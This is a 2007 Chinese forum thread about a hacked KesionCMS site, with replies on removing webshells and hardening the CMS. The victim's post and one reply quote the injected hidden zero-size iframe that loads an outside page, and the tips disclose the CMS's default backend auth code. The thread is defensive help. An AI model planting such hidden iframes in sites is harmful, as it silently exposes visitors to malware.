|
主题:我的科讯 被人黑了,救命 啊 [收藏主题] | 转到: |
后台进不去,察看源码发现被人增加了 <iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe> 这些字段。救命啊
|
|
支持(0) | 反对(0) 顶端 底部 |
longer1981 发表于:2007/2/26 15:38:00 | 只看该作者 查看该作者主题
沙发
|
|
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
binghebook 发表于:2007/2/26 16:30:00 | 只看该作者 查看该作者主题
9楼
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe> 你要找到目马文件才行啊,先关毕程序的所有上传,然后到cms中UpFiles/User/目录中找到有.asp的文件夹,那肯定是黑你的人建立的,在下面找到.gif或.jpg的图片文件,想办法让他显示出来,如果没有显示示或显示的是一页代码那肯定就是木马了,删! |
|
支持(0) | 反对(0) 顶端 底部 |
这里我给大家总结几条使用科汛系统安全的小经验: 1、删除install.asp文件 网站安装成功后,一定要删除install.asp文件(非常重要)。 2、及时修改数据库名称 由于科汛自带的数据库是在ks_data目录下的ks_database.mdb,如果你没有对它进行更名,这时可能你的数据库就会随时被了解科汛结构的人下载,从而导致后台用户密码被***等。解决方法就是及时对数据库进行更名。将数据库改为难以猜测的名称,并将数据库的扩展名改为.asp等。 3、设置后台登录认证码 认证码的作用就是当有人知道你后台用户名和密码,但不知道认证码时,也无法登录后台。科汛V3.X默认的认证码是kesion2006,建议你及时打开admin目录下的chkcode.asp进行设置,具体位置如下: Const EnableSiteManageCode = True '是否启用后台管理认证码 是: True 否: False 4、修改后台的管理路径 科汛默认的后台文件都在admin目录下,以免给不良居心的朋友猜到,你可以对该目录进行更名,如改为manage等。改完后只需登录后台进行目录设置即可,具体如下系统设置->基本信息设置->目录选项,并将admin/改成你的名称并保存即可。
5、尽量不要给会员太大的上传权限 科汛3.0的会员系统有了很大的改进,每个会员上传的文件都有独立的目录。系统默认每个会员分配2M的存储空间。你可以在后台进行详细的设置。特别是允许上传的类型要小心设置,千万不要允许上传.asp,.aspx,.php等为扩展名的文件。如果不允行用户上传任何文件,可以将分配的存储空间设为0,具体步骤:系统设置->基本信息设置->会员选项,如下图的会员可用空是大小设为0即表示,不允许上传。
6、做好服务器的安全工作 |
|||||||||
支持(0) | 反对(0) 顶端 底部 |
<上一主题 | 下一主题 > |